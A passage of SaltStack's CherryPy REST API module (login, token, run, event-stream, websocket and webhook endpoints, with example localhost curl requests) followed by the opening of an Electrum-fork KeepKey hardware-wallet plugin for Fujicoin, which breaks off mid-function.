:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
"""
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning("Salt Master is not available.")
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get("username", None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if "token" not in token:
raise cherrypy.HTTPError(
401, "Could not authenticate using provided credentials"
)
cherrypy.response.headers["X-Auth-Token"] = cherrypy.session.id
cherrypy.session["token"] = token["token"]
cherrypy.session["timeout"] = (token["expire"] - token["start"]) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get("external_auth", {}).get(token["eauth"], {})
if token["eauth"] == "django" and "^model" in eauth:
perms = token["auth_list"]
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token["name"], [])
perms.extend(eauth.get("*", []))
if "groups" in token and token["groups"]:
user_groups = set(token["groups"])
eauth_groups = {
i.rstrip("%") for i in eauth.keys() if i.endswith("%")
}
for group in user_groups & eauth_groups:
perms.extend(eauth["{}%".format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception: # pylint: disable=broad-except
logger.debug(
"Configuration for external_auth malformed for "
"eauth '{}', and user '{}'.".format(
token.get("eauth"), token.get("name")
),
exc_info=True,
)
perms = None
return {
"return": [
{
"token": cherrypy.session.id,
"expire": token["expire"],
"start": token["start"],
"user": token["name"],
"eauth": token["eauth"],
"perms": perms or {},
}
]
}
class Logout(LowDataAdapter):
"""
Class to remove or invalidate sessions
"""
_cp_config = dict(
LowDataAdapter._cp_config,
**{"tools.salt_auth.on": True, "tools.lowdata_fmt.on": False}
)
def POST(self): # pylint: disable=arguments-differ
"""
Destroy the currently active session and expire the session cookie
"""
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {"return": "Your token has been cleared"}
class Token(LowDataAdapter):
"""
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
"""
@cherrypy.config(**{"tools.sessions.on": False})
def POST(self, **kwargs):
r"""
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
"""
for creds in cherrypy.request.lowstate:
try:
creds.update(
{
"client": "runner",
"fun": "auth.mk_token",
"kwarg": {
"username": creds["username"],
"password": creds["password"],
"eauth": creds["eauth"],
},
}
)
except KeyError:
raise cherrypy.HTTPError(
400, 'Require "username", "password", and "eauth" params'
)
return list(self.exec_lowstate())
class Run(LowDataAdapter):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
salt-api does not enforce authorization, Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.sessions.on": False})
def POST(self, **kwargs):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>` Other than that this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of lowstate data describing Salt commands must be sent in
the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run enpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instead,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: text
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
"""
return {
"return": list(self.exec_lowstate()),
}
class Events:
"""
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
"""
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
"""
# Make sure that auth token is hex. If it's None, or something other
# than hex, this will raise a ValueError.
try:
int(auth_token, 16)
except (TypeError, ValueError):
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get("token", auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r"""
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: text
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialze the
JSON object each time.
.. code-block:: text
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
"""
cookies = cherrypy.request.cookie
auth_token = (
token
or salt_token
or (cookies["session_id"].value if "session_id" in cookies else None)
)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers["Content-Type"] = "text/event-stream"
cherrypy.response.headers["Cache-Control"] = "no-cache"
cherrypy.response.headers["Connection"] = "keep-alive"
def listen():
"""
An iterator to yield Salt events
"""
event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=True,
)
stream = event.iter_events(full=True, auto_reconnect=True)
yield "retry: 400\n" # future lint: disable=blacklisted-function
while True:
data = next(stream)
yield "tag: {}\n".format(
data.get("tag", "")
) # future lint: disable=blacklisted-function
yield "data: {}\n\n".format(
salt.utils.json.dumps(data)
) # future lint: disable=blacklisted-function
return listen()
class WebsocketEndpoint:
"""
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
"tools.websocket.on": True,
"tools.websocket.handler_cls": websockets.SynchronizingWebsocket,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
"""
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: text
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: text
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
"""
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get("token")
else:
salt_token = cherrypy.session.get("token")
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
"""
An iterator to return Salt events (and optionally format them)
"""
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=True,
)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if "format_events" in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
"data: {}\n\n".format(
salt.utils.json.dumps(data)
), # future lint: disable=blacklisted-function
False,
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{}".format(data)
)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle asynchronous push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook:
"""
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor <reactor>`
"""
exposed = True
tag_base = ["salt", "netapi", "hook"]
_cp_config = dict(
LowDataAdapter._cp_config,
**{
# Don't do any lowdata processing on the POST data
"tools.lowdata_fmt.on": True,
# Auth can be overridden in __init__().
"tools.salt_auth.on": True,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=False,
)
if cherrypy.config["apiopts"].get("webhook_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def POST(self, *args, **kwargs):
"""
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: text
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
"""
tag = "/".join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, "raw_body", "")
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event(
{"body": raw_body, "post": data, "headers": headers}, tag
)
return {"success": ret}
class Stats:
"""
Expose statistics on the running CherryPy server
"""
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def __init__(self):
if cherrypy.config["apiopts"].get("stats_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def GET(self):
"""
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
"""
if hasattr(logging, "statistics"):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App:
"""
Class to serve HTML5 apps
"""
exposed = True
def GET(self, *args):
"""
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
"""
apiopts = cherrypy.config["apiopts"]
default_index = os.path.abspath(
os.path.join(os.path.dirname(__file__), "index.html")
)
return cherrypy.lib.static.serve_file(apiopts.get("app", default_index))
class API:
"""
Collect configuration and URL map for building the CherryPy app
"""
url_map = {
"index": LowDataAdapter,
"login": Login,
"logout": Logout,
"token": Token,
"minions": Minions,
"run": Run,
"jobs": Jobs,
"keys": Keys,
"events": Events,
"stats": Stats,
}
def _setattr_url_map(self):
"""
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
"""
if self.apiopts.get("enable_sessions", True) is False:
url_blacklist = ["login", "logout", "minions", "jobs"]
else:
url_blacklist = []
urls = (
(url, cls) for url, cls in self.url_map.items() if url not in url_blacklist
)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
"""
Assemble any dynamic or configurable URLs
"""
if HAS_WEBSOCKETS:
self.url_map.update({"ws": WebsocketEndpoint})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update(
{self.apiopts.get("webhook_url", "hook").lstrip("/"): Webhook}
)
# Enable the single-page JS app URL.
self.url_map.update({self.apiopts.get("app_path", "app").lstrip("/"): App})
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
"""
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
"""
conf = {
"global": {
"server.socket_host": self.apiopts.get("host", "0.0.0.0"),
"server.socket_port": self.apiopts.get("port", 8000),
"server.thread_pool": self.apiopts.get("thread_pool", 100),
"server.socket_queue_size": self.apiopts.get("queue_size", 30),
"max_request_body_size": self.apiopts.get(
"max_request_body_size", 1048576
),
"debug": self.apiopts.get("debug", False),
"log.access_file": self.apiopts.get("log_access_file", ""),
"log.error_file": self.apiopts.get("log_error_file", ""),
},
"/": {
"request.dispatch": cherrypy.dispatch.MethodDispatcher(),
"tools.trailing_slash.on": True,
"tools.gzip.on": True,
"tools.html_override.on": True,
"tools.cors_tool.on": True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, "12.0.0") < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf["global"]["engine.timeout_monitor.on"] = self.apiopts.get(
"expire_responses", True
)
if cpstats and self.apiopts.get("collect_stats", False):
conf["/"]["tools.cpstats.on"] = True
if "favicon" in self.apiopts:
conf["/favicon.ico"] = {
"tools.staticfile.on": True,
"tools.staticfile.filename": self.apiopts["favicon"],
}
if self.apiopts.get("debug", False) is False:
conf["global"]["environment"] = "production"
# Serve static media if the directory has been set in the configuration
if "static" in self.apiopts:
conf[self.apiopts.get("static_path", "/static")] = {
"tools.staticdir.on": True,
"tools.staticdir.dir": self.apiopts["static"],
}
# Add to global config
cherrypy.config.update(conf["global"])
return conf
def get_app(opts):
"""
Returns a WSGI app and a configuration dictionary
"""
apiopts = opts.get(__name__.rsplit(".", 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config["saltopts"] = opts
cherrypy.config["apiopts"] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import deserialize_xpub
from electrum import constants
from electrum.i18n import _
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = keepkeylib.transport_hid.DEVICE_IDS
self.device_manager().register_devices(self.DEVICE_IDS)
self.libraries_available = True
except ImportError:
self.libraries_available = False
def hid_transport(self, pair):
from keepkeylib.transport_hid import HidTransport
return HidTransport(pair)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def create_client(self, device, handler):
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "Fujicoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
